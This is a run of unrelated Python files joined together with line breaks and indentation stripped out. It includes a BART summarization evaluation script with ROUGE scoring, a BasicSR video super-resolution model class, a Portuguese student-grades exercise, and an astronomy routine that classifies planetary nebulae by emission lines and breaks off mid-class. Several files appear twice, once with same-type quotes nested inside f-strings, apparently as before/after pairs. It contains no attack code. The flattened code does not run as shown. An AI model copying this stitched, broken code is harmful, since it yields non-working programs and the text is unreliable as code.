cur_vert = verts[0] for next_vert in verts[1:]: # Skip if cur_vert is start of nighttime period if cur_vert.vert_type != "None" and next_vert.index > cur_vert.index: bouts.append(niq_classes.Bout(gui, cur_vert.index, next_vert.index - 1, cur_vert.vert_type)) cur_vert = next_vert bouts.sort(key=lambda x: x.first) return bouts def is_number(string): try: float(string) except ValueError: return False return True
import torch from fairseq.models.bart import BARTModel import argparse from pprint import pprint from tqdm import tqdm import os from os.path import join import shutil import logging import numpy as np import json import random import string import files2rouge import time def test_rouge(cand, ref, outpath=None, tmp_dir='/tmp/'): def random_string(stringLength=8): """Generate a random string of fixed length """ letters= string.ascii_lowercase return ''.join(random.sample(letters,stringLength)) tmp_path = join(tmp_dir, 'tmp'+random_string()) os.makedirs(tmp_path) hyp_path = join(tmp_path, 'hyp.txt') ref_path = join(tmp_path, 'ref.txt') candidates = [line.strip().lower() for line in open(cand, encoding='utf-8')] references = [json.loads(line.strip())['target'] for line in open(ref, encoding='utf-8')] paper_ids = [json.loads(line.strip())['paper_id'] for line in open(ref, encoding='utf-8')] assert len(candidates) == len(references), f'{tmp_dir}: len cand {len(candidates)} len ref {len(references)}' all_scores = [] save_scores = [] # For each prediction for cand_idx, cand in enumerate(candidates): curr_targets = references[cand_idx] curr_scores = [] hyp = open(join(tmp_path, 'hyp.txt'), 'w') hyp.write(cand) hyp.close() # For each target for tgt in curr_targets: tgt = tgt.lower().strip('\n') ref = open(join(tmp_path, 'ref.txt'), 'w') ref.write(tgt) ref.close() try: _r = files2rouge.run(ref_path, hyp_path, to_json=True) except Exception as e: print(e) exit(0) curr_scores.append(_r) # Take the max of curr scores r1 = [r['rouge-1']['f'] for r in curr_scores] max_idx = r1.index(max(r1)) save_scores.append({ 'paper_id': paper_ids[cand_idx], 'all_scores': curr_scores, 'max_idx': max_idx, 'prediction': cand, 'target': curr_targets }) all_scores.append(curr_scores[max_idx]) # Average across all scores avg_scores = {"rouge-1": { "f": [], "p": [], "r":[] }, "rouge-2": { "f": [], "p": [], "r": [] }, "rouge-l": { "f": [], "p": [], "r": [] } } # Append all scores to an array, the average over array for score in all_scores: for r_type in score.keys(): for m_type in score[r_type].keys(): x = score[r_type][m_type] avg_scores[r_type][m_type].append(x) for r_type in avg_scores.keys(): for m_type in avg_scores[r_type].keys(): x = avg_scores[r_type][m_type] avg_scores[r_type][m_type] = np.mean(x) if outpath: with open(outpath, 'w') as fout: for s in save_scores: fout.write(json.dumps(s) + '\n') shutil.rmtree(tmp_path) return avg_scores def evaluate(bart, bsz, count, datadir, outdir, decoder_params, test_fname='test.hypo', multitarget=False, quick=False): if torch.cuda.is_available(): bart.cuda() bart.half() bart.eval() source_fname = os.path.join(datadir, 'test.source') pred_fname = os.path.join(outdir, test_fname) with open(source_fname, encoding="utf-8") as source, open(pred_fname, 'w', encoding="utf-8") as fout: sline = source.readline().strip() # sline = f'{sline} {decoder_params['ctrl']} .' slines = [sline] for sline in tqdm(source): if count % bsz == 0: with torch.no_grad(): hypotheses_batch = bart.sample(slines, beam=decoder_params['beam'], lenpen=decoder_params['lenpen'], max_len_b=decoder_params['max_len_b'], min_len=decoder_params['min_len'], no_repeat_ngram_size=decoder_params['no_repeat_ngram_size']) for hypothesis in hypotheses_batch: fout.write(hypothesis + '\n') fout.flush() slines = [] slines.append(sline.strip()) count += 1 if slines != []: hypotheses_batch = bart.sample(slines, beam=decoder_params['beam'], lenpen=decoder_params['lenpen'], max_len_b=decoder_params['max_len_b'], min_len=decoder_params['min_len'], no_repeat_ngram_size=decoder_params['no_repeat_ngram_size']) for hypothesis in hypotheses_batch: fout.write(hypothesis.replace('\n', ' ') + '\n') fout.flush() ref_fname = 'test.jsonl' ref_fname = os.path.join(datadir, ref_fname) r = test_rouge(pred_fname, ref_fname, outpath=os.path.join(outdir, test_fname + '.rouge')) return r def maybe_percentages(r, percentages): if percentages: for r_type in ['rouge-1', 'rouge-2', 'rouge-l']: for m_type in ['f', 'p', 'r']: x = r[r_type][m_type] r[r_type][m_type] = x * 100 return r if __name__=='__main__': parser = argparse.ArgumentParser() parser.add_argument('datadir') parser.add_argument('checkpoint_dir') parser.add_argument('--checkpoint_file', default='checkpoint_best.pt') parser.add_argument('--outdir', default='') parser.add_argument('--percentages', action='store_true', default=False, help='flag if you want to print as percentages') # Decoder params # parser.add_argument('--ctrl', default='<|TLDR|>') parser.add_argument('--count', default=1, type=int) parser.add_argument('--batch_size', '--bsz', default=32, type=int, dest='bsz') parser.add_argument('--test_fname', default='test.hypo') parser.add_argument('--beam', default=6, type=int) parser.add_argument('--lenpen', default=1.0, type=float) parser.add_argument('--max_len_b', default=30, type=int) parser.add_argument('--min_len', default=5, type=int) parser.add_argument('--no_repeat_ngram_size', default=3, type=int) args = parser.parse_args() start = time.time() #### Path checks if not os.path.exists(args.datadir): print(f'{args.datadir} does not exist') exit(0) if not os.path.exists(join(args.datadir, 'test.source')): print(f'{join(args.datadir, 'test.source')} does not exist') exit(0) if (not os.path.exists(join(args.checkpoint_dir, args.checkpoint_file))): print(f'{join(args.checkpoint_dir, args.checkpoint_file)} does not exist') exit(0) if not args.outdir: args.outdir = args.checkpoint_dir os.makedirs(args.outdir, exist_ok=True) if args.datadir.endswith('/'): args.datadir = args.datadir[:-1] bart = BARTModel.from_pretrained( args.checkpoint_dir, checkpoint_file=args.checkpoint_file, data_name_or_path=args.datadir + '-bin', task='translation' ) decoder_params ={ # 'ctrl': args.ctrl, 'beam': args.beam, 'lenpen': args.lenpen, 'max_len_b': args.max_len_b, 'min_len': args.min_len, 'no_repeat_ngram_size': args.no_repeat_ngram_size } r = evaluate(bart, args.bsz, args.count, args.datadir, args.outdir, decoder_params, test_fname=args.test_fname, ) r['beam'] = args.beam r['lenpen'] = args.lenpen pprint(maybe_percentages(r, args.percentages)) with open(join(args.outdir, args.test_fname + '.score'), 'w') as fout: fout.write(json.dumps(r, indent=4)) end = time.time() print(f'Time to run script: {(end-start)} sec')
import torch from fairseq.models.bart import BARTModel import argparse from pprint import pprint from tqdm import tqdm import os from os.path import join import shutil import logging import numpy as np import json import random import string import files2rouge import time def test_rouge(cand, ref, outpath=None, tmp_dir='/tmp/'): def random_string(stringLength=8): """Generate a random string of fixed length """ letters= string.ascii_lowercase return ''.join(random.sample(letters,stringLength)) tmp_path = join(tmp_dir, 'tmp'+random_string()) os.makedirs(tmp_path) hyp_path = join(tmp_path, 'hyp.txt') ref_path = join(tmp_path, 'ref.txt') candidates = [line.strip().lower() for line in open(cand, encoding='utf-8')] references = [json.loads(line.strip())['target'] for line in open(ref, encoding='utf-8')] paper_ids = [json.loads(line.strip())['paper_id'] for line in open(ref, encoding='utf-8')] assert len(candidates) == len(references), f'{tmp_dir}: len cand {len(candidates)} len ref {len(references)}' all_scores = [] save_scores = [] # For each prediction for cand_idx, cand in enumerate(candidates): curr_targets = references[cand_idx] curr_scores = [] hyp = open(join(tmp_path, 'hyp.txt'), 'w') hyp.write(cand) hyp.close() # For each target for tgt in curr_targets: tgt = tgt.lower().strip('\n') ref = open(join(tmp_path, 'ref.txt'), 'w') ref.write(tgt) ref.close() try: _r = files2rouge.run(ref_path, hyp_path, to_json=True) except Exception as e: print(e) exit(0) curr_scores.append(_r) # Take the max of curr scores r1 = [r['rouge-1']['f'] for r in curr_scores] max_idx = r1.index(max(r1)) save_scores.append({ 'paper_id': paper_ids[cand_idx], 'all_scores': curr_scores, 'max_idx': max_idx, 'prediction': cand, 'target': curr_targets }) all_scores.append(curr_scores[max_idx]) # Average across all scores avg_scores = {"rouge-1": { "f": [], "p": [], "r":[] }, "rouge-2": { "f": [], "p": [], "r": [] }, "rouge-l": { "f": [], "p": [], "r": [] } } # Append all scores to an array, the average over array for score in all_scores: for r_type in score.keys(): for m_type in score[r_type].keys(): x = score[r_type][m_type] avg_scores[r_type][m_type].append(x) for r_type in avg_scores.keys(): for m_type in avg_scores[r_type].keys(): x = avg_scores[r_type][m_type] avg_scores[r_type][m_type] = np.mean(x) if outpath: with open(outpath, 'w') as fout: for s in save_scores: fout.write(json.dumps(s) + '\n') shutil.rmtree(tmp_path) return avg_scores def evaluate(bart, bsz, count, datadir, outdir, decoder_params, test_fname='test.hypo', multitarget=False, quick=False): if torch.cuda.is_available(): bart.cuda() bart.half() bart.eval() source_fname = os.path.join(datadir, 'test.source') pred_fname = os.path.join(outdir, test_fname) with open(source_fname, encoding="utf-8") as source, open(pred_fname, 'w', encoding="utf-8") as fout: sline = source.readline().strip() # sline = f'{sline} {decoder_params["ctrl"]} .' slines = [sline] for sline in tqdm(source): if count % bsz == 0: with torch.no_grad(): hypotheses_batch = bart.sample(slines, beam=decoder_params['beam'], lenpen=decoder_params['lenpen'], max_len_b=decoder_params['max_len_b'], min_len=decoder_params['min_len'], no_repeat_ngram_size=decoder_params['no_repeat_ngram_size']) for hypothesis in hypotheses_batch: fout.write(hypothesis + '\n') fout.flush() slines = [] slines.append(sline.strip()) count += 1 if slines != []: hypotheses_batch = bart.sample(slines, beam=decoder_params['beam'], lenpen=decoder_params['lenpen'], max_len_b=decoder_params['max_len_b'], min_len=decoder_params['min_len'], no_repeat_ngram_size=decoder_params['no_repeat_ngram_size']) for hypothesis in hypotheses_batch: fout.write(hypothesis.replace('\n', ' ') + '\n') fout.flush() ref_fname = 'test.jsonl' ref_fname = os.path.join(datadir, ref_fname) r = test_rouge(pred_fname, ref_fname, outpath=os.path.join(outdir, test_fname + '.rouge')) return r def maybe_percentages(r, percentages): if percentages: for r_type in ['rouge-1', 'rouge-2', 'rouge-l']: for m_type in ['f', 'p', 'r']: x = r[r_type][m_type] r[r_type][m_type] = x * 100 return r if __name__=='__main__': parser = argparse.ArgumentParser() parser.add_argument('datadir') parser.add_argument('checkpoint_dir') parser.add_argument('--checkpoint_file', default='checkpoint_best.pt') parser.add_argument('--outdir', default='') parser.add_argument('--percentages', action='store_true', default=False, help='flag if you want to print as percentages') # Decoder params # parser.add_argument('--ctrl', default='<|TLDR|>') parser.add_argument('--count', default=1, type=int) parser.add_argument('--batch_size', '--bsz', default=32, type=int, dest='bsz') parser.add_argument('--test_fname', default='test.hypo') parser.add_argument('--beam', default=6, type=int) parser.add_argument('--lenpen', default=1.0, type=float) parser.add_argument('--max_len_b', default=30, type=int) parser.add_argument('--min_len', default=5, type=int) parser.add_argument('--no_repeat_ngram_size', default=3, type=int) args = parser.parse_args() start = time.time() #### Path checks if not os.path.exists(args.datadir): print(f'{args.datadir} does not exist') exit(0) if not os.path.exists(join(args.datadir, 'test.source')): print(f'{join(args.datadir, "test.source")} does not exist') exit(0) if (not os.path.exists(join(args.checkpoint_dir, args.checkpoint_file))): print(f'{join(args.checkpoint_dir, args.checkpoint_file)} does not exist') exit(0) if not args.outdir: args.outdir = args.checkpoint_dir os.makedirs(args.outdir, exist_ok=True) if args.datadir.endswith('/'): args.datadir = args.datadir[:-1] bart = BARTModel.from_pretrained( args.checkpoint_dir, checkpoint_file=args.checkpoint_file, data_name_or_path=args.datadir + '-bin', task='translation' ) decoder_params ={ # 'ctrl': args.ctrl, 'beam': args.beam, 'lenpen': args.lenpen, 'max_len_b': args.max_len_b, 'min_len': args.min_len, 'no_repeat_ngram_size': args.no_repeat_ngram_size } r = evaluate(bart, args.bsz, args.count, args.datadir, args.outdir, decoder_params, test_fname=args.test_fname, ) r['beam'] = args.beam r['lenpen'] = args.lenpen pprint(maybe_percentages(r, args.percentages)) with open(join(args.outdir, args.test_fname + '.score'), 'w') as fout: fout.write(json.dumps(r, indent=4)) end = time.time() print(f'Time to run script: {(end-start)} sec')
import torch from collections import Counter from os import path as osp from torch import distributed as dist from tqdm import tqdm from basicsr.metrics import calculate_metric from basicsr.utils import get_root_logger, imwrite, tensor2img from basicsr.utils.dist_util import get_dist_info from basicsr.utils.registry import MODEL_REGISTRY from .video_base_model import VideoBaseModel @MODEL_REGISTRY.register() class VideoRecurrentModel(VideoBaseModel): def __init__(self, opt): super(VideoRecurrentModel, self).__init__(opt) if self.is_train: self.fix_flow_iter = opt['train'].get('fix_flow') def setup_optimizers(self): train_opt = self.opt['train'] flow_lr_mul = train_opt.get('flow_lr_mul', 1) logger = get_root_logger() logger.info(f'Multiple the learning rate for flow network with {flow_lr_mul}.') if flow_lr_mul == 1: optim_params = self.net_g.parameters() else: # separate flow params and normal params for different lr normal_params = [] flow_params = [] for name, param in self.net_g.named_parameters(): if 'spynet' in name: flow_params.append(param) else: normal_params.append(param) optim_params = [ { # add normal params first 'params': normal_params, 'lr': train_opt['optim_g']['lr'] }, { 'params': flow_params, 'lr': train_opt['optim_g']['lr'] * flow_lr_mul }, ] optim_type = train_opt['optim_g'].pop('type') self.optimizer_g = self.get_optimizer(optim_type, optim_params, **train_opt['optim_g']) self.optimizers.append(self.optimizer_g) def optimize_parameters(self, current_iter): if self.fix_flow_iter: logger = get_root_logger() if current_iter == 1: logger.info(f'Fix flow network and feature extractor for {self.fix_flow_iter} iters.') for name, param in self.net_g.named_parameters(): if 'spynet' in name or 'edvr' in name: param.requires_grad_(False) elif current_iter == self.fix_flow_iter: logger.warning('Train all the parameters.') self.net_g.requires_grad_(True) super(VideoRecurrentModel, self).optimize_parameters(current_iter) def dist_validation(self, dataloader, current_iter, tb_logger, save_img): dataset = dataloader.dataset dataset_name = dataset.opt['name'] with_metrics = self.opt['val']['metrics'] is not None # initialize self.metric_results # It is a dict: { # 'folder1': tensor (num_frame x len(metrics)), # 'folder2': tensor (num_frame x len(metrics)) # } if with_metrics: if not hasattr(self, 'metric_results'): # only execute in the first run self.metric_results = {} num_frame_each_folder = Counter(dataset.data_info['folder']) for folder, num_frame in num_frame_each_folder.items(): self.metric_results[folder] = torch.zeros( num_frame, len(self.opt['val']['metrics']), dtype=torch.float32, device='cuda') # initialize the best metric results self._initialize_best_metric_results(dataset_name) # zero self.metric_results rank, world_size = get_dist_info() if with_metrics: for _, tensor in self.metric_results.items(): tensor.zero_() metric_data = dict() num_folders = len(dataset) num_pad = (world_size - (num_folders % world_size)) % world_size if rank == 0: pbar = tqdm(total=len(dataset), unit='folder') # Will evaluate (num_folders + num_pad) times, but only the first num_folders results will be recorded. # (To avoid wait-dead) for i in range(rank, num_folders + num_pad, world_size): idx = min(i, num_folders - 1) val_data = dataset[idx] folder = val_data['folder'] # compute outputs val_data['lq'].unsqueeze_(0) val_data['gt'].unsqueeze_(0) self.feed_data(val_data) val_data['lq'].squeeze_(0) val_data['gt'].squeeze_(0) self.test() visuals = self.get_current_visuals() # tentative for out of GPU memory del self.lq del self.output if 'gt' in visuals: del self.gt torch.cuda.empty_cache() if self.center_frame_only: visuals['result'] = visuals['result'].unsqueeze(1) if 'gt' in visuals: visuals['gt'] = visuals['gt'].unsqueeze(1) # evaluate if i < num_folders: for idx in range(visuals['result'].size(1)): result = visuals['result'][0, idx, :, :, :] result_img = tensor2img([result]) # uint8, bgr metric_data['img'] = result_img if 'gt' in visuals: gt = visuals['gt'][0, idx, :, :, :] gt_img = tensor2img([gt]) # uint8, bgr metric_data['img2'] = gt_img if save_img: if self.opt['is_train']: raise NotImplementedError('saving image is not supported during training.') else: if self.center_frame_only: # vimeo-90k clip_ = val_data['lq_path'].split('/')[-3] seq_ = val_data['lq_path'].split('/')[-2] name_ = f'{clip_}_{seq_}' img_path = osp.join(self.opt['path']['visualization'], dataset_name, folder, f"{name_}_{self.opt["name"]}.png") else: # others img_path = osp.join(self.opt['path']['visualization'], dataset_name, folder, f"{idx:08d}_{self.opt["name"]}.png") # image name only for REDS dataset imwrite(result_img, img_path) # calculate metrics if with_metrics: for metric_idx, opt_ in enumerate(self.opt['val']['metrics'].values()): result = calculate_metric(metric_data, opt_) self.metric_results[folder][idx, metric_idx] += result # progress bar if rank == 0: for _ in range(world_size): pbar.update(1) pbar.set_description(f'Folder: {folder}') if rank == 0: pbar.close() if with_metrics: if self.opt['dist']: # collect data among GPUs for _, tensor in self.metric_results.items(): dist.reduce(tensor, 0) dist.barrier() if rank == 0: self._log_validation_metric_values(current_iter, dataset_name, tb_logger) def test(self): n = self.lq.size(1) self.net_g.eval() flip_seq = self.opt['val'].get('flip_seq', False) self.center_frame_only = self.opt['val'].get('center_frame_only', False) if flip_seq: self.lq = torch.cat([self.lq, self.lq.flip(1)], dim=1) with torch.no_grad(): self.output = self.net_g(self.lq) if flip_seq: output_1 = self.output[:, :n, :, :, :] output_2 = self.output[:, n:, :, :, :].flip(1) self.output = 0.5 * (output_1 + output_2) if self.center_frame_only: self.output = self.output[:, n // 2, :, :, :] self.net_g.train()
import torch from collections import Counter from os import path as osp from torch import distributed as dist from tqdm import tqdm from basicsr.metrics import calculate_metric from basicsr.utils import get_root_logger, imwrite, tensor2img from basicsr.utils.dist_util import get_dist_info from basicsr.utils.registry import MODEL_REGISTRY from .video_base_model import VideoBaseModel @MODEL_REGISTRY.register() class VideoRecurrentModel(VideoBaseModel): def __init__(self, opt): super(VideoRecurrentModel, self).__init__(opt) if self.is_train: self.fix_flow_iter = opt['train'].get('fix_flow') def setup_optimizers(self): train_opt = self.opt['train'] flow_lr_mul = train_opt.get('flow_lr_mul', 1) logger = get_root_logger() logger.info(f'Multiple the learning rate for flow network with {flow_lr_mul}.') if flow_lr_mul == 1: optim_params = self.net_g.parameters() else: # separate flow params and normal params for different lr normal_params = [] flow_params = [] for name, param in self.net_g.named_parameters(): if 'spynet' in name: flow_params.append(param) else: normal_params.append(param) optim_params = [ { # add normal params first 'params': normal_params, 'lr': train_opt['optim_g']['lr'] }, { 'params': flow_params, 'lr': train_opt['optim_g']['lr'] * flow_lr_mul }, ] optim_type = train_opt['optim_g'].pop('type') self.optimizer_g = self.get_optimizer(optim_type, optim_params, **train_opt['optim_g']) self.optimizers.append(self.optimizer_g) def optimize_parameters(self, current_iter): if self.fix_flow_iter: logger = get_root_logger() if current_iter == 1: logger.info(f'Fix flow network and feature extractor for {self.fix_flow_iter} iters.') for name, param in self.net_g.named_parameters(): if 'spynet' in name or 'edvr' in name: param.requires_grad_(False) elif current_iter == self.fix_flow_iter: logger.warning('Train all the parameters.') self.net_g.requires_grad_(True) super(VideoRecurrentModel, self).optimize_parameters(current_iter) def dist_validation(self, dataloader, current_iter, tb_logger, save_img): dataset = dataloader.dataset dataset_name = dataset.opt['name'] with_metrics = self.opt['val']['metrics'] is not None # initialize self.metric_results # It is a dict: { # 'folder1': tensor (num_frame x len(metrics)), # 'folder2': tensor (num_frame x len(metrics)) # } if with_metrics: if not hasattr(self, 'metric_results'): # only execute in the first run self.metric_results = {} num_frame_each_folder = Counter(dataset.data_info['folder']) for folder, num_frame in num_frame_each_folder.items(): self.metric_results[folder] = torch.zeros( num_frame, len(self.opt['val']['metrics']), dtype=torch.float32, device='cuda') # initialize the best metric results self._initialize_best_metric_results(dataset_name) # zero self.metric_results rank, world_size = get_dist_info() if with_metrics: for _, tensor in self.metric_results.items(): tensor.zero_() metric_data = dict() num_folders = len(dataset) num_pad = (world_size - (num_folders % world_size)) % world_size if rank == 0: pbar = tqdm(total=len(dataset), unit='folder') # Will evaluate (num_folders + num_pad) times, but only the first num_folders results will be recorded. # (To avoid wait-dead) for i in range(rank, num_folders + num_pad, world_size): idx = min(i, num_folders - 1) val_data = dataset[idx] folder = val_data['folder'] # compute outputs val_data['lq'].unsqueeze_(0) val_data['gt'].unsqueeze_(0) self.feed_data(val_data) val_data['lq'].squeeze_(0) val_data['gt'].squeeze_(0) self.test() visuals = self.get_current_visuals() # tentative for out of GPU memory del self.lq del self.output if 'gt' in visuals: del self.gt torch.cuda.empty_cache() if self.center_frame_only: visuals['result'] = visuals['result'].unsqueeze(1) if 'gt' in visuals: visuals['gt'] = visuals['gt'].unsqueeze(1) # evaluate if i < num_folders: for idx in range(visuals['result'].size(1)): result = visuals['result'][0, idx, :, :, :] result_img = tensor2img([result]) # uint8, bgr metric_data['img'] = result_img if 'gt' in visuals: gt = visuals['gt'][0, idx, :, :, :] gt_img = tensor2img([gt]) # uint8, bgr metric_data['img2'] = gt_img if save_img: if self.opt['is_train']: raise NotImplementedError('saving image is not supported during training.') else: if self.center_frame_only: # vimeo-90k clip_ = val_data['lq_path'].split('/')[-3] seq_ = val_data['lq_path'].split('/')[-2] name_ = f'{clip_}_{seq_}' img_path = osp.join(self.opt['path']['visualization'], dataset_name, folder, f"{name_}_{self.opt['name']}.png") else: # others img_path = osp.join(self.opt['path']['visualization'], dataset_name, folder, f"{idx:08d}_{self.opt['name']}.png") # image name only for REDS dataset imwrite(result_img, img_path) # calculate metrics if with_metrics: for metric_idx, opt_ in enumerate(self.opt['val']['metrics'].values()): result = calculate_metric(metric_data, opt_) self.metric_results[folder][idx, metric_idx] += result # progress bar if rank == 0: for _ in range(world_size): pbar.update(1) pbar.set_description(f'Folder: {folder}') if rank == 0: pbar.close() if with_metrics: if self.opt['dist']: # collect data among GPUs for _, tensor in self.metric_results.items(): dist.reduce(tensor, 0) dist.barrier() if rank == 0: self._log_validation_metric_values(current_iter, dataset_name, tb_logger) def test(self): n = self.lq.size(1) self.net_g.eval() flip_seq = self.opt['val'].get('flip_seq', False) self.center_frame_only = self.opt['val'].get('center_frame_only', False) if flip_seq: self.lq = torch.cat([self.lq, self.lq.flip(1)], dim=1) with torch.no_grad(): self.output = self.net_g(self.lq) if flip_seq: output_1 = self.output[:, :n, :, :, :] output_2 = self.output[:, n:, :, :, :].flip(1) self.output = 0.5 * (output_1 + output_2) if self.center_frame_only: self.output = self.output[:, n // 2, :, :, :] self.net_g.train()
ficha = list() while True: nome = str(input('Nome: ')) nota1 = float(input('Nota 01: ')) nota2 = float(input('Nota 02: ')) media = (nota1 + nota2) / 2 ficha.append([nome, nota1, nota2, media]) resp = str(input('Quer continuar? (S/N) ')) if resp in 'Nn': break print('-=' * 30) print(f'{'No.':<4}{'Nome':<10}{'MEDIA':>8}') print('-' * 26) for i, a in enumerate(ficha): print(f'{i:<4}{a[0]:<10}{a[2]:>8.1f}') while True: print('-=' * 35) opc = int(input('Mostrar notas de qual aluno? (999 interrompe): ')) if opc == 999: print('Finalizando...') break if opc <= len(ficha)- 1: print(f'Notas de {ficha[opc][0]} são {ficha[opc][1], ficha[opc][2]}') print('<<< VOLTE SEMPRE >>>')
ficha = list() while True: nome = str(input('Nome: ')) nota1 = float(input('Nota 01: ')) nota2 = float(input('Nota 02: ')) media = (nota1 + nota2) / 2 ficha.append([nome, nota1, nota2, media]) resp = str(input('Quer continuar? (S/N) ')) if resp in 'Nn': break print('-=' * 30) print(f'{"No.":<4}{"Nome":<10}{"MEDIA":>8}') print('-' * 26) for i, a in enumerate(ficha): print(f'{i:<4}{a[0]:<10}{a[2]:>8.1f}') while True: print('-=' * 35) opc = int(input('Mostrar notas de qual aluno? (999 interrompe): ')) if opc == 999: print('Finalizando...') break if opc <= len(ficha)- 1: print(f'Notas de {ficha[opc][0]} são {ficha[opc][1], ficha[opc][2]}') print('<<< VOLTE SEMPRE >>>')
import logging # use instead of print for more control from pathlib import Path # filesystem related stuff import numpy as np # numerical computations from matplotlib.pyplot import subplots, figure, savefig import matplotlib.pyplot as plt from astropy.stats import sigma_clipped_stats # calcualte statistics of images from astropy.table import Table from scipy.optimize import minimize from scipy.integrate import quad from inspect import signature from .constants import single_column,two_column,tab10 from .old import MaximumLikelihood logger = logging.getLogger(__name__) def emission_line_diagnostics(table,distance_modulus,completeness_limit,distance_modulus_err=0.1,detection_limit=5): '''Classify objects based on their emission lines we use four criteria to distinguish between PN, HII regions and SNR: criteria1 -> emperical upper limit (currently not used) 4 > log10 [OIII] / (Ha +[NII]) criteria2 -> HII regions log10 [OIII] / (Ha +[NII]) > -0.37 M[OIII] - 1.16 criteria3 -> SNR Ha / [SII] < 2.5 criteria4 -> velocity dispersion The second criteria requires the absolute magnitude of the objects. Therefor the distance_modulus is needed as an input to this function Parameters ---------- table : Astropy Table Table with measured fluxes completeness_limit : float Sources fainter than this magnitude are ignored distance_modulus : float A first guess of the distance modulus (used for diagnostics) distance_modulus = m - M detection_limit : float how many sigma are needed for a detection (default=3). Non detections are set to detection_limit*uncertainty. Returns ------- table : Astropy Table The input table with an additional column, indicating the type of the object ''' # we don't want to modift the original input table table = table.copy() logger.info(f'{len(table)} entries in initial catalogue') logger.info(f'using mu={distance_modulus:.2f}, cl={completeness_limit}') # make sure that the new column can save strings with 3 characters # we start with the assumption that all sources are PN and remove contaminants later table['type'] = np.empty(len(table),dtype='U3') table['type'][:] = 'PN' # calculate the absolute magnitude based on a first estimate of the distance modulus table['MOIII'] = table['mOIII'] - distance_modulus table['dMOIII'] = np.sqrt(table['dmOIII']**2 + distance_modulus_err**2) # we need the the sum of the [SII] lines for the SNR criteria table['SII_flux'] = table['SII6716_flux']+table['SII6730_flux'] table['SII_flux_err'] = np.sqrt(table['SII6716_flux_err']**2+table['SII6730_flux_err']**2) # we set negative fluxes and none detections to th error (0 would cause errors because we work with ratios) for col in ['HB4861','OIII5006','HA6562','NII6583','SII']: detection = (table[f'{col}_flux']>0) & (table[f'{col}_flux']>detection_limit*table[f'{col}_flux_err']) table[f'{col}_flux'][np.where(~detection)] = table[f'{col}_flux_err'][np.where(~detection)] table[f'{col}_detection'] = detection # calculate velocity dispersion (use line with best signal to noise) table['OIII5006_S/N'] = table['OIII5006_flux']/table['OIII5006_flux_err'] table['HA6562_S/N'] = table['HA6562_flux']/table['HA6562_flux_err'] table['SII_S/N'] = table['SII_flux']/table['SII_flux_err'] # we use the Halpha velocity dispersion. the others can behave funny table['v_SIGMA'] = table['HA6562_SIGMA'] table['v_SIGMA_S/N'] = table['HA6562_S/N'] #table['v_SIGMA'][np.where(table['HA6562_SIGMA']/table['HA6562_SIGMA_ERR']>table['v_SIGMA_S/N'] )] = table['HA6562_SIGMA'][np.where(table['HA6562_SIGMA']/table['HA6562_SIGMA_ERR']>table['v_SIGMA_S/N'] )] #table['v_SIGMA_S/N'][np.where(table['HA6562_SIGMA']/table['HA6562_SIGMA_ERR']>table['v_SIGMA_S/N'] )] = table['HA6562_S/N'][np.where(table['HA6562_SIGMA']/table['HA6562_SIGMA_ERR']>table['v_SIGMA_S/N'] )] #table['v_SIGMA'][np.where(table['SII6716_SIGMA']/table['SII6716_SIGMA_ERR']>table['v_SIGMA_S/N'])] = table['SII6716_SIGMA'][np.where(table['SII6716_SIGMA']/table['SII6716_SIGMA_ERR']>table['v_SIGMA_S/N'] )] #table['v_SIGMA_S/N'][table['SII6716_SIGMA']/table['SII6716_SIGMA_ERR']>table['v_SIGMA_S/N'] )] = table['SII_S/N'][np.where(table['SII6716_SIGMA']/table['SII6716_SIGMA_ERR']>table['v_SIGMA_S/N'] )] #logger.info('v_sigma: median={:.2f}, median={:.2f}, sig={:.2f}'.format(*sigma_clipped_stats(table['v_SIGMA'][~np.isnan(table['v_SIGMA'])]))) # define ratio of OIII to Halpha and NII for the first criteria (with error). If NII is not detected we assume NII=0.5Halpha table['logR'] = np.log10(table['OIII5006_flux'] / (table['HA6562_flux']+table['NII6583_flux'])) table['logR'][~table['NII6583_detection']] = np.log10(table['OIII5006_flux'][~table['NII6583_detection']] / (1.5*table['HA6562_flux'][~table['NII6583_detection']])) table['dlogR'] = np.sqrt((table['OIII5006_flux_err'] / table['OIII5006_flux'])**2 + (table['HA6562_flux_err'] / (table['HA6562_flux']+table['NII6583_flux']))**2 + (table['NII6583_flux_err'] / (table['HA6562_flux']+table['NII6583_flux']))**2) /np.log(10) # define criterias to exclude non PN objects criteria = {} if True: # this criteria should be log(4) which would remove a lot of objects. no idea why so many objects have such high line ratios #criteria[''] = (np.log10(4) < (table['R'])) #& (table['HA6562_detection']) criteria['HII'] = (table['logR'] < -0.37*(table['MOIII']+table['dMOIII']) - 1.16) & (table['HA6562_detection']) criteria['SNR'] = (table['HA6562_flux']/table['SII_flux'] < 2.5) & (table['SII_detection']) elif True: # here we retain things in the sample if they are within 1 sigma #criteria[''] = (4 < (table['R']- 3*table['dR'])) #& (table['HA6562_detection']) criteria['HII'] = (table['logR'] + table['dlogR'] < -0.37*(table['MOIII']+table['dmOIII']) - 1.16) #& (table['HA6562_detection'] | table['NII6583_detection']) HAoverSII = table['HA6562_flux']/table['SII_flux'] HAoverSII_err = HAoverSII * np.sqrt((table['HA6562_flux_err']/table['HA6562_flux'])**2 + (table['SII_flux_err']/table['SII_flux'])**2) criteria['SNR'] = ((HAoverSII + HAoverSII_err) < 2.5) else: # use HB as a criteria (because this line is close to OIII, extinction should not be an issue) criteria['HII'] = (np.log10(table['OIII5006'] / table['HB4861']) < -0.37*table['MOIII'] - 0.71) & table['HB4861_detection'] #criteria['SNR'] |= (table['v_SIGMA']>100) & table['SII_detection'] # objects that would be classified as PN by narrowband observations table['SNRorPN'] = criteria['SNR'] & ~criteria['HII'] for k in criteria.keys(): table['type'][np.where(criteria[k])] = k # remove rows with NaN values in some columns mask = np.ones(len(table), dtype=bool) for col in ['HB4861_flux','OIII5006_flux','HA6562_flux','NII6583_flux','SII_flux']: mask &= ~np.isnan(table[col]) table['type'][np.where(~mask)] = 'NaN' # purely for information mask = table['mOIII']< completeness_limit logger.info(f'{np.sum(~mask)} objects below the completness limit of {completeness_limit}') logger.info(f'{len(table[table['type']==''])} objects classified as 4<log [OIII]/Ha') logger.info(f'{len(table[table['type']=='HII'])} ({len(table[(table['type']=='HII') & (table['mOIII']<completeness_limit)])}) objects classified as HII') logger.info(f'{len(table[table['type']=='SNR'])} ({len(table[(table['type']=='SNR') & (table['mOIII']<completeness_limit)])}) objects classified as SNR') logger.info(f'{len(table[table['type']=='PN'])} ({len(table[(table['type']=='PN') & (table['mOIII']<completeness_limit)])}) objects classified as PN') return table def gaussian(x,mu,sig): return 1/np.sqrt(2*np.pi*sig**2) * np.exp(-(x-mu)**2/(2*sig**2)) class MaximumLikelihood1D: 